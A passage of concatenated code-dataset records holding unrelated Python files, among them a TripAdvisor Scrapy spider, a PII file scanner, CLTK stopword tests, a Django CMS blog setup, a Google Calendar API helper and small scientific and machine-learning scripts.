os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\ndf = pd.read_csv(filepath_or_buffer=dir_path+'/tripadvisor_all_location.csv')\n\n# alter index to get other location\nidentify_link = list(df.identify_link)[23]\nlink = list(df.link)[23]\n\n\nclass TripadvisorHotelSpider(scrapy.Spider):\n name = 'tripadvisor_hotel'\n allowed_domains = ['tripadvisor.com.vn']\n start_urls = [link]\n\n custom_settings={ 'FEED_URI': f\"tripadvisor_{identify_link}.csv\",\n 'FEED_FORMAT': 'csv'}\n\n\n def parse(self, response):\n\n print(\"procesing:\"+response.url)\n \n hotel_class=response.css(\".listing_title > a\")\n name_hotel=hotel_class.css(\"a::text\").extract()\n url_hotel=hotel_class.css(\"a::attr(href)\").extract()\n\n row_data=zip(name_hotel, url_hotel)\n\n for item in row_data:\n scraped_info = {\n 'name_hotel':item[0],\n 'url' : response.urljoin(item[1])\n }\n\n yield scraped_info\n\n\n NEXT_PAGE_SELECTOR = \".ui_pagination > a.next::attr(href)\"\n next_page = response.css(NEXT_PAGE_SELECTOR).extract_first()\n if next_page:\n yield scrapy.Request(\n response.urljoin(next_page),\n callback=self.parse)\n","sub_path":"scrapy/Assigment_AIS/tripadvisor_pages/tripadvisor_pages/spiders/tripadvisor_hotel.py","file_name":"tripadvisor_hotel.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384904413","text":"import matplotlib.pyplot as plt\nfrom scipy import linalg\nimport numpy as np\n\nR_range = np.linspace(0, 10, 100, endpoint=True)\nb = np.array([0, 120, 120])\nI2_list = []\n\n\nfor R_x in R_range:\n a = np.array([[1, -1, -1],\n [3.5, R_x, 0],\n [3.5, 0, 6.6]])\n\n x = linalg.solve(a, b)\n I2_list.append(x[1])\n\n\nPower_list = [I2_list[i]**2 * R_range[i] for i in range(len(I2_list))]\nP_max_idx = Power_list.index(max(Power_list))\nprint(f\"Maksymalna moc wydzialana na oporniku: {round(Power_list[P_max_idx], 2)} W\")\nprint(f\"Wartosc oporu R_x, przy ktorej moc wydzielana jest najwieksza: {round(R_range[P_max_idx], 2)} Ω\")\n\n\nfor i in Power_list:\n print(i)\n\n\"\"\"\"\nplt.plot(R_range, Power_list, 'ro-', label=r\"P($R_x$)\")\nplt.scatter(R_range[P_max_idx], Power_list[P_max_idx], label=r'$P_{max}$', linewidths=7)\nplt.grid()\nplt.xlabel(\"R [Ω]\", fontsize=20)\nplt.ylabel(\"P [W]\", fontsize=20)\nplt.title(r'Wykres mocy wydzielanej przez opornik $R_x$ w zaleznosci od wartosci rezystancji opornika $R_x$', fontsize = 30)\nplt.legend(fontsize=40)\n\nmng = plt.get_current_fig_manager()\nmng.full_screen_toggle()\nplt.show()\n\"\"\"","sub_path":"raport/raport2.py","file_name":"raport2.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219180974","text":"import tableprint\nimport json\nimport logging\nimport os\nimport magic\nimport csv\n\nfrom piicatcher.tokenizer import Tokenizer\nfrom piicatcher.explorer.metadata import NamedObject\nfrom piicatcher.piitypes import PiiTypes, PiiTypeEncoder\nfrom piicatcher.scanner import NERScanner, RegexScanner\n\n\ndef dispatch(ns):\n logging.debug(\"File Dispatch entered\")\n explorer = FileExplorer(ns.path)\n explorer.scan()\n with open(\"output.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(explorer.data_db)\n if ns.output_format == \"ascii_table\":\n headers = [\"Path\", \"Mime/Type\", \"pii\"]\n tableprint.table(explorer.get_tabular(), headers)\n elif ns.output_format == \"json\":\n print(json.dumps(explorer.get_dict(), sort_keys=True, indent=2, cls=PiiTypeEncoder))\n\n\ndef parser(sub_parsers):\n sub_parser = sub_parsers.add_parser(\"files\")\n\n sub_parser.add_argument(\"--path\",\n help=\"Path to file or directory\")\n\n sub_parser.add_argument(\"--output\", default=None,\n help=\"File path for report. If not specified, \"\n \"then report is printed to sys.stdout\")\n sub_parser.add_argument(\"--output-format\", choices=[\"ascii_table\", \"json\", \"orm\"],\n default=\"ascii_table\",\n help=\"Choose output format type\")\n sub_parser.set_defaults(func=dispatch)\n\n\nclass File(NamedObject):\n\n def __init__(self, name, mime_type):\n super(File, self).__init__(name)\n self._mime_type = mime_type\n\n def get_mime_type(self):\n return self._mime_type\n\n def scan(self, context, data_db, ref):\n tokenizer = context['tokenizer']\n regex = context['regex']\n ner = context['ner']\n\n if not self._mime_type.startswith('text/'):\n self._pii.add(PiiTypes.UNSUPPORTED)\n else:\n with open(self.get_name(), 'r') as f:\n data = f.read()\n [self._pii.add(pii) for pii in ner.scan(data, data_db, ref=os.path.basename(self.get_name()))]\n print(self.get_name())\n tokens = tokenizer.tokenize(data)\n for t in tokens:\n if not t.is_stop:\n [self._pii.add(pii) for pii in regex.scan(t.text, data_db,\n ref=os.path.basename(self.get_name()))]\n\n\nclass FileExplorer:\n def __init__(self, path):\n self._path = path\n self._files = []\n self.data_db = []\n\n def scan(self):\n logging.debug(\"Scanning %s\" % self._path)\n if os.path.isfile(self._path):\n mime_type = magic.from_file(self._path, mime=True)\n self._files.append(File(self._path, mime_type))\n logging.debug('\\t- full path: %s, mime_type: %s' % (os.path.abspath(self._path), mime_type))\n else:\n for root, subdirs, files in os.walk(self._path):\n for filename in files:\n file_path = os.path.join(root, filename)\n mime_type = magic.from_file(file_path, mime=True)\n\n # print('\\t- full path: %s, mime_type: %s' % (file_path, mime_type))\n self._files.append(File(file_path, mime_type))\n\n context = {'tokenizer': Tokenizer(), 'regex': RegexScanner(), 'ner': NERScanner()}\n for f in self._files:\n root_filename = os.path.basename(f._name)\n f.scan(context, self.data_db, ref=root_filename)\n\n def get_tabular(self):\n tabular = []\n for f in self._files:\n tabular.append([f.get_name(), f.get_mime_type(), json.dumps(list(f.get_pii_types()),\n cls=PiiTypeEncoder)])\n return tabular\n\n def get_dict(self):\n result = []\n for f in self._files:\n result.append({\n 'path': f.get_name(),\n 'Mime/Type': f.get_mime_type(),\n 'pii': list(f.get_pii_types())\n })\n\n return {'files': result}\n","sub_path":"piicatcher/explorer/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"99408997","text":"\"\"\"Test cltk.stop.\"\"\"\n\n__license__ = 'MIT License. See LICENSE.'\n\nfrom cltk.corpus.utils.importer import CorpusImporter\nfrom cltk.stop.greek.stops import STOPS_LIST as GREEK_STOPS\nfrom cltk.stop.latin.stops import STOPS_LIST as LATIN_STOPS\nfrom cltk.stop.french.stops import STOPS_LIST as FRENCH_STOPS\nfrom cltk.stop.arabic.stopword_filter import stopwords_filter as arabic_stop_filter\nfrom nltk.tokenize.punkt import PunktLanguageVars\nimport os\nimport unittest\n\n\nclass TestSequenceFunctions(unittest.TestCase):\n \"\"\"Class for unittest\"\"\"\n\n def setUp(self):\n \"\"\"Clone Greek models in order to test pull function and other model\n tests later.\n \"\"\"\n corpus_importer = CorpusImporter('greek')\n corpus_importer.import_corpus('greek_models_cltk')\n file_rel = os.path.join('~/cltk_data/greek/model/greek_models_cltk/README.md')\n file = os.path.expanduser(file_rel)\n file_exists = os.path.isfile(file)\n self.assertTrue(file_exists)\n\n corpus_importer = CorpusImporter('latin')\n corpus_importer.import_corpus('latin_models_cltk')\n file_rel = os.path.join('~/cltk_data/latin/model/latin_models_cltk/README.md')\n file = os.path.expanduser(file_rel)\n file_exists = os.path.isfile(file)\n self.assertTrue(file_exists)\n\n def test_greek_stopwords(self):\n \"\"\"Test filtering Greek stopwords.\"\"\"\n sentence = 'Ἅρπαγος δὲ καταστρεψάμενος Ἰωνίην ἐποιέετο στρατηίην \\\n ἐπὶ Κᾶρας καὶ Καυνίους καὶ Λυκίους, ἅμα ἀγόμενος καὶ Ἴωνας καὶ \\\n Αἰολέας.'\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in GREEK_STOPS]\n target_list = ['ἅρπαγος', 'καταστρεψάμενος', 'ἰωνίην', 'ἐποιέετο',\n 'στρατηίην', 'κᾶρας', 'καυνίους', 'λυκίους', ',',\n 'ἅμα', 'ἀγόμενος', 'ἴωνας', 'αἰολέας.']\n self.assertEqual(no_stops, target_list)\n\n def test_latin_stopwords(self):\n \"\"\"Test filtering Latin stopwords.\"\"\"\n sentence = 'Quo usque tandem abutere, Catilina, patientia nostra?'\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in LATIN_STOPS]\n target_list = ['usque', 'tandem', 'abutere', ',', 'catilina', ',',\n 'patientia', 'nostra', '?']\n self.assertEqual(no_stops, target_list)\n def test_arabic_stopwords(self):\n \"\"\"Test filtering arabic stopwords.\"\"\"\n sentence = 'سُئِل بعض الكُتَّاب عن الخَط، متى يَسْتحِقُ أن يُوصَف بِالجَودةِ؟'\n no_stops = arabic_stop_filter(sentence)\n target_list = ['سئل', 'الكتاب', 'الخط', '،', 'يستحق', 'يوصف', 'بالجودة', '؟']\n self.assertEqual(no_stops, target_list)\n\n def test_french_stopwords(self):\n ##test filtering French stopwords\n sentence = \"En pensé ai e en talant que d ’ Yonec vus die avant dunt il fu nez, e de sun pere cum il vint primes a sa mere .\"\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in FRENCH_STOPS]\n target_list = ['pensé', 'talant', 'd', '’', 'yonec', 'die', 'avant', 'dunt', 'nez', ',', 'pere', 'cum', 'primes',\n 'mere','.']\n self.assertEqual(no_stops, target_list)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cltk/tests/test_stop.py","file_name":"test_stop.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"234565503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\ntry:\n from django.apps import AppConfig\nexcept ImportError:\n class AppConfig(object):\n pass\n\n\nclass BlogAppConfig(AppConfig):\n name = 'djangocms_blog'\n verbose_name = _('django CMS Blog')\n\n @staticmethod\n def setup():\n from cms.api import create_page, create_title\n from cms.exceptions import NoHomeFound\n from cms.models import Page\n from cms.utils import get_language_list\n from cms.utils.conf import get_templates\n from django.utils.translation import override\n\n from .cms_appconfig import BlogConfig\n from .settings import get_setting\n\n if get_setting('AUTO_SETUP'):\n configs = BlogConfig.objects.all()\n if not configs.exists():\n config = BlogConfig.objects.create(namespace='Blog')\n langs = get_language_list()\n blog = None\n for lang in langs:\n with override(lang):\n config.set_current_language(lang)\n config.app_title = get_setting('AUTO_APP_TITLE')\n config.save()\n default_template = get_templates()[0][0]\n try:\n home = Page.objects.get_home()\n except NoHomeFound:\n home = None\n if not home:\n home = create_page(\n get_setting('AUTO_HOME_TITLE'), language=lang,\n template=default_template, in_navigation=True, published=True\n )\n elif lang not in home.get_languages():\n create_title(\n language=lang, title=get_setting('AUTO_HOME_TITLE'), page=home\n )\n home.publish(lang)\n if not blog:\n blog = create_page(\n get_setting('AUTO_BLOG_TITLE'), language=lang, apphook='BlogApp',\n apphook_namespace=config.namespace, parent=home,\n template=default_template, in_navigation=True, published=True\n )\n else:\n create_title(\n language=lang, title=get_setting('AUTO_BLOG_TITLE'), page=blog\n )\n blog.publish(lang)\n","sub_path":"djangocms_blog/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"512495205","text":"from bs4 import BeautifulSoup\nimport numpy as np\nimport re\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport codecs\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ntrain = pd.read_csv(\"data/LabeledTrainData.csv\", header=0, delimiter=\",\",encoding = 'utf-8')\ntest = pd.read_csv(\"data/TestData.tsv\", header=0, delimiter=\"\\t\",encoding = 'utf-8',quoting = 3)\nfile_name = 'data/StopWords.txt'\nwith codecs.open(file_name,'r','utf-8') as inp:\n stop_words = [x[:-1] for x in inp.readlines()]\n\ndef tokenize(text):\n REGEX = re.compile(\" \")\n sentence = text\n words = (REGEX.split(sentence))\n return words\n\ndef news_to_words(raw_news):\n example1 = BeautifulSoup(raw_news,'html.parser')\n letters_only = re.sub(\"[^\\u0980-\\u09FF]\",\" \",example1.get_text())\n letters_only = re.sub(\"[\\u09E6-\\u09EF]+| ৷\",\" \",letters_only)\n words = letters_only.split()\n meaningful_words = [w for w in words if not w in stop_words]\n return (\" \".join(meaningful_words))\n\n\n\ndef clean_train_data():\n num_news = len(train[\"news\"])\n st = ''\n for i in range(0,num_news):\n if ((i + 1) % 3 == 0):\n #print(\"news %d of %d\\n\" % (i + 1, num_news))\n st = news_to_words(train[\"news\"][i])\n clean_train_news.append(news_to_words(train[\"news\"][i]))\n\n\n\ndef clean_test_data():\n num_news = len(test[\"news\"])\n print(\"len of test news is \",num_news)\n st = ''\n for i in range(0, num_news):\n if ((i + 1) % 2 == 0):\n # print(\"news %d of %d\\n\" % (i + 1, num_news))\n st = news_to_words(test[\"news\"][i])\n clean_test_news.append(news_to_words(test[\"news\"][i]))\n\nclean_train_news = []\nclean_test_news = []\n\nclean_train_data()\nvectorizer = CountVectorizer( analyzer='word', tokenizer = lambda x : tokenize(x), lowercase=False, ngram_range=(1,1) )\nprint(vectorizer)\nfeature_train_array = vectorizer.fit_transform(clean_train_news)\nfeature_train_array = feature_train_array.toarray()\nfeature_names = vectorizer.get_feature_names()\n\n#print(test[\"news\"])\nclean_test_data()\nfeature_test_array = vectorizer.transform(clean_test_news)\nfeature_test_array = feature_test_array.toarray()\nprint(feature_test_array)\n\n\n\n\"\"\"\"\ndist = np.sum(train_data_features,axis = 0)\nfor tag,count in zip(vocab,dist):\n print(tag,count)\nforest = RandomForestClassifier(n_estimators=100)\nforest = forest.fit(train_data_features,train[\"sentiment\"])\nprint(len(train[\"sentiment\"]))\ntest = pd.read_csv(\"data/TestData.tsv\",header=0,delimiter=\"\\t\",quoting=3)\nprint(test.shape)\nnum_reviews = len(test[\"news\"])\nclean_test_reviews = []\n\nfor i in range(0,num_reviews):\n if((i+1) % 1000 == 0):\n print(\"Review %d of %d\\n\" % (i + 1, num_reviews))\n clean_review = news_to_words(test[\"news\"][i])\n clean_test_reviews.append(clean_review)\ntest_data_features = vectorizer.transform(clean_test_reviews)\ntest_data_features = test_data_features.toarray()\nresult = forest.predict(test_data_features)\noutput = pd.DataFrame(data = {\"id\":test[\"\"],\"sentiment\":result})\noutput.to_csv(\"Bag_of_Words_model.csv\",index = False,quoting=3)\n\"\"\"\n\nvocab = vectorizer.get_feature_names()\ndist = np.sum(feature_test_array,axis = 0)\n#for tag,count in zip(vocab,dist):\n# print(tag,count)\nforest = RandomForestClassifier(n_estimators=100)\nforest = forest.fit(feature_train_array,train[\"sentiment\"])\nresult = forest.predict(feature_test_array)\nids = []\nfor i in range(0,len(test[\"news\"])):\n ids.append(i)\ntest_id = pd.DataFrame()\ntest_id[\"id\"] = ids\n#for i in range(0,len(ids)):\n# print(ids[i])\noutput = pd.DataFrame(data = {\"id\":test_id[\"id\"],\"sentiment\":result})\noutput.to_csv(\"result/Bag_of_Words_model.csv\",index = False,quoting=3)\n\n\n\n\n","sub_path":"SVM check/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"22980748","text":"'''\nFaça um programa que tenha uma função notas() que pode receber várias notas de alunos e vai retornar um dicionário\ncom as seguintes informações:\n - Quantidade de notas\n - A maior nota\n - A menor nota\n - A média da turma\n - A situação (opcional)\nAdicione tb as docstrings da função.\n'''\n\n\ndef notas(*nts, mostrasitu=False):\n \"\"\"\n => Função para analisar notas e situação de uma turma com vários alunos.\n :param nts: uma ou mais notas dos alunos\n :param mostrasitu: parametro opcional, indicando se deve ou não adicionar a situação na saída\n :return: dicionário com informações sobre a turma (quantidade de notas, maior nota, menor nota, média da turma e\n situação (opcional))\n \"\"\"\n\n\n dici = {}\n dici['qtd'] = len(nts)\n dici['maior'] = max(nts)\n dici['menor'] = min(nts)\n dici['media'] = sum(nts) / len(nts)\n\n if mostrasitu:\n if dici['media'] >= 7:\n dici['situ'] = 'BOA'\n elif dici['media'] >= 5:\n dici['situ'] = 'RAZOÁVEL'\n else:\n dici['situ'] = 'RUIM'\n\n return dici\n\n\ndicionario = notas(9, 10, 5.5, 2.5, 8.5, mostrasitu=True)\nprint(dicionario)\n","sub_path":"Prontos e Corrigidos/ex105.py","file_name":"ex105.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265250091","text":"import gspread\nimport json\n\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nscope = ['https://spreadsheets.google.com/feeds']\njson_key = json.load(open('client_secret_1033617619515-93p0cc389fnvtn67peioa22r8gq9d5vb.apps.googleusercontent.com.json'))\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('client_id.json', scope)\n\n\ngc = gspread.authorize(credentials)\n\n# Open a worksheet from spreadsheet with one shot\nwks = gc.open(\"Where is the money Lebowski?\").sheet1\n\nwks.update_acell('B2', \"it's down there somewhere, let me take another look.\")\n\n# Fetch a cell range\ncell_list = wks.range('A1:B7')\n","sub_path":"old/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644279763","text":"# ecoding=utf-8\r\n__author__ = \"liyinlong\"\r\n\r\n\"\"\"\r\n公共信息\r\n\"\"\"\r\n\r\nfrom appium import webdriver\r\nimport logging\r\nimport os\r\n\r\n\r\n\r\nclass AppiumTest():\r\n def __init__(self):\r\n \r\n desired_caps = {'platformName': 'Android',\r\n 'platformVersion': '6.0.1',\r\n 'deviceName': 'a155b926',\r\n 'appPackage': 'com.wuba.moneybox',\r\n 'appActivity': 'com.wuba.moneybox.ui.SplashActivity'}\r\n self.driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\r\n self.driver.implicitly_wait(30)\r\n\r\n def get_driver(self):\r\n return self.driver\r\n \r\nclass log():\r\n def log(self,text): \r\n FILE = os.getcwd() \r\n logging.basicConfig(level=logging.INFO, \r\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', \r\n datefmt='%a, %d %b %Y %H:%M:%S', \r\n filename=os.path.join(FILE,'log.txt'), \r\n filemode='w') \r\n \r\n return logging.info(text)\r\n \r\n\r\n \r\n ","sub_path":"app_test/Base_driver.py","file_name":"Base_driver.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"27531746","text":"import pandas as pd\n\nyears = [2016, 2017, 2018, 2019, 2020]\ndfs = []\n\ndef dfYear(start_df, year):\n col = f'happiness_score_{year}'\n df = happy_df[['country', col]]\n df = df.rename(columns={col: \"happy\"})\n df['year'] = year\n print(df.head())\n\n return df\n\n\n# Read data\nhappy_df = pd.read_csv('data/final/happy_gov_continent.csv', delimiter=',')\n\nfor i in range(0,len(years)):\n dfs.append(dfYear(happy_df, years[i]))\n\noutput = pd.concat(dfs)\n\n\noutput.to_csv('data/final/lineData.csv', index=False, header=True)\n\n# happy2016 = dfYear(happy_df, 2016)\n# happy2017 = dfYear(happy_df, 2017)\n# happy2018 = dfYear(happy_df, 2018)\n# happy2019 = dfYear(happy_df, 2019)\n# happy2020 = dfYear(happy_df, 2020)\n\n\n\n\n# out_df.to_csv('data/final/happy_gov_continent.csv', index=False, header=True)","sub_path":"scripts/lineData.py","file_name":"lineData.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"574777304","text":"import socket\nfrom datetime import datetime\nsock = socket.socket()\nsock.bind(('', 1111))\nsock.listen(1) #maybe more\nwhile True:\n conn, adr = sock.accept()\n data = conn.recv(1024)\n msg = data.decode('utf8')\n print(msg, adr)\nconn.close()\n","sub_path":"a_server.py","file_name":"a_server.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"328192924","text":"from typing import Any\nfrom lib import *\n\n# 2028 Too high\n\ndata = fileIntoArray(\"data8.txt\")[0]\n\nWIDTH = 25\nHEIGHT = 6\n\nBLACK = 0\nWHITE = 1\nTRANSPARENT = 2\n\nBLOCKS = ['\\u2591', '\\u2588']\n\n\ndef chunk(l: [Any], n: int) -> [[Any]]:\n return [l[i:i + n] for i in range(0, len(l), n)]\n\n\nlayers: [[int]] = chunk(mapList(toInt, data), WIDTH*HEIGHT)\n\n# layers.sort(key=lambda l: l.count(0))\n\n# print(layers[0].count(1) * layers[0].count(2))\n\noutput = []\n\nfor h in range(HEIGHT):\n output.append([])\n for w in range(WIDTH):\n i = h * WIDTH + w\n for layer in layers:\n if layer[i] != TRANSPARENT:\n output[h].append(BLOCKS[layer[i]])\n print(BLOCKS[layer[i]], end=\"\")\n break\n print(\"\")\n","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"8663052","text":"import numpy as np\nimport generator \nimport pickle\nfrom sklearn.linear_model import Ridge\n\ndef seq_to_feat(x):\n return np.hstack([x.mean(0), x.std(0)])\n\nX_tr, X_te, Y_tr, Y_te = generator.human.honest()\n\nX_tr = np.float32(np.vstack( [seq_to_feat(i) for i in X_tr] ))\nX_te = np.float32(np.vstack( [seq_to_feat(i) for i in X_te] ))\n\nY_te = np.float32(Y_te)\nY_tr = np.float32(Y_tr)\n\nscores = []\nc_list = list(range(-7,7))\nfor i in c_list:\n clf = Ridge(alpha=10.**i)\n clf.fit(X_tr, Y_tr)\n Y_hat = clf.predict(X_te)\n score = np.mean(np.array(Y_hat<0.5)==np.array(Y_te<0.5))\n print(score)\n scores.append(score)\nbest_c = c_list[np.argmax(scores)]\nprint(best_c)\n\nclf = Ridge(alpha=10.**best_c)\nY_hat = clf.fit(X_tr,Y_tr).predict(X_te)\nscore = np.mean(np.array(Y_hat<0)==np.array(Y_te<0))\nprint(score)\n\nX = np.vstack([X_tr,X_te])\nY = np.hstack([Y_tr,Y_te])\nclf.fit(X,Y)\n\npickle.dump(clf,open('honest_sklearn_model.pkl','wb'))\n","sub_path":"src/emonet/train/train_hone.py","file_name":"train_hone.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183992079","text":"matrix = [list(map(int, input().split())) for i in range(5)]\r\nlocation = None\r\n\r\nflag = True\r\ni = 0\r\n\r\nwhile i < len(matrix) and flag:\r\n j = 0\r\n while j < len(matrix[i]) and flag:\r\n if matrix[i][j] == 1:\r\n location = [i, j]\r\n flag = False\r\n j+=1\r\n i+=1\r\n\r\nres = abs(location[0] - 2) + abs(location[1] - 2)\r\nprint(res)","sub_path":"codeforces/beautiful_matrix.py","file_name":"beautiful_matrix.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315675986","text":"from collections import namedtuple\nimport datetime as dt\nimport pickle\nimport os\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.auth.exceptions import TransportError\nfrom httplib2 import ServerNotFoundError\n\nimport pandas as pd\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = [\"https://www.googleapis.com/auth/calendar.readonly\"]\n\n\ndef _get_google_calendar_creds():\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n creds = None\n if os.path.exists(\"token.pickle\"):\n with open(\"token.pickle\", \"rb\") as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n try:\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\"credentials.json\", SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(\"token.pickle\", \"wb\") as token:\n pickle.dump(creds, token)\n except TransportError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Exiting. Can't complete task. Check the internet connection.\")\n exit()\n return creds\n\n\ndef _format_calendar_events(events):\n Record = namedtuple(\"Record\", [\"id\", \"start_utc\", \"end_utc\", \"updated_utc\", \"summary\", \"description\"])\n events_list = []\n for event in events:\n try:\n description = event[\"description\"]\n except KeyError:\n description = None\n try:\n startdatetime = event[\"start\"][\"dateTime\"]\n enddatetime = event[\"end\"][\"dateTime\"]\n updated_utc = event[\"updated\"]\n except KeyError:\n # if the event is \"all day\", it will be a date instead of dateTime. We ignore these events\n startdatetime = None\n enddatetime = None\n event_tuple = Record(event[\"id\"], startdatetime, enddatetime, updated_utc, event[\"summary\"], description)\n events_list.append(event_tuple)\n df = pd.DataFrame(events_list, columns=Record._fields)\n df = df.rename(columns={\"id\": \"event_id\"})\n df[\"duration_seconds\"] = (pd.to_datetime(df[\"end_utc\"]) - pd.to_datetime(df[\"start_utc\"])).astype(\"timedelta64[s]\")\n return df\n\n\ndef get_google_calendar_events(calendar_id, total_days):\n \"\"\"\n Calls the Google Calendar API to pull calendar events\n :param calendar_id: Google calendar ID\n :param total_days: total days in the future to pull\n :return: returns a list of first 2500 events (Google API property) or up to \"total days\" worth of events, each event is a dictionary\n \"\"\"\n credentials = _get_google_calendar_creds()\n try:\n service = build(\"calendar\", \"v3\", credentials=credentials)\n except ServerNotFoundError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Can't connect to Google Calendar. Check the internet connection.\")\n return\n now = dt.datetime.utcnow()\n last_day = (now + dt.timedelta(days=total_days)).isoformat() + \"Z\"\n now = now.isoformat() + \"Z\" # 'Z' indicates UTC time\n try:\n events_result = (\n service.events()\n .list(\n calendarId=calendar_id,\n timeMin=now,\n timeMax=last_day,\n singleEvents=True,\n orderBy=\"startTime\",\n timeZone=\"UTC\",\n )\n .execute()\n )\n except ServerNotFoundError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Exiting. Can't get calendar events from the Google Calendar. Check the internet connection.\")\n return\n events = events_result.get(\"items\", [])\n events = _format_calendar_events(events)\n return events\n","sub_path":"_google_calendar_api.py","file_name":"_google_calendar_api.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192865259","text":"import unittest\nimport models.irrigationmodel as irrigationmodel\nfrom models.irrigationmodel import IrrigationType\n\nclass Test(unittest.TestCase):\n \n def testModel(self):\n inputs = { \"water_use_total\":12.45,\n \"irrigation_types_proportions\":\n {\n IrrigationType.surface_irrigation_no_energy:0.1,\n IrrigationType.surface_irrigation_electricity:0.05,\n IrrigationType.surface_irrigation_diesel:0.15,\n IrrigationType.sprinkler_irrigation_electricity:0.20,\n IrrigationType.sprinkler_irrigation_diesel:0.18,\n IrrigationType.drip_irrigation_electricity:0.02,\n IrrigationType.drip_irrigation_diesel:0.30\n }\n }\n expectedResults = {\"m_Irr_water_to_air\": 8.8146,\n \"m_Irr_water_to_water_river\": 2.90831999,\n \"m_Irr_water_to_water_groundwater\": 0.72707999\n }\n \n results = irrigationmodel.IrrigationModel(inputs).compute()\n \n for key, value in expectedResults.items():\n #if type(value) is dict:\n # for k,v in value.items():\n # self.assertAlmostEqual(results[key][k], v)\n self.assertAlmostEqual(results[key], value)\n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test/python/models/test_irrigationmodel.py","file_name":"test_irrigationmodel.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227324292","text":"import numpy as np\r\nimport math\r\n\r\ndef geometry():\r\n\r\n # Geomety input\r\n r_hub_LE = np.array([0.2, 0.2, 0.2, 0.2])\r\n r_hub_TE = np.array([0.2, 0.2, 0.2, 0.2])\r\n r_tip_LE = np.array([0.270, 0.280, 0.290, 0.300])\r\n r_tip_TE = np.array([0.2790, 0.2890, 0.3020, 0.3120])\r\n x_LE = np.array([0, 0.05, 0.09, 0.130]) #coordinates\r\n x_TE = np.array([0.04, 0.08, 0.120, 0.170])\r\n angle_in_blade = np.array([0, 12, 6.5, 12]) #måste ju vara i grader\r\n D_LE = np.array([0.0025, 0.0025, 0.0025, 0.0025])\r\n chord = np.array([0.0600, 0.0400, 0.0600, 0.0400])\r\n b = np.array([0.040, 0.020, 0.030, 0.020]) #axial chord\r\n s = np.array([0.030, 0.053, 0.030, 0.053]) #pitch\r\n SONC = np.array([0.8, 0.8, 0.8, 0.8]) #pitch/chord ratio\r\n SONE = np.array([0, 0, 0, 0]) #pitch/mean radius of curvation\r\n 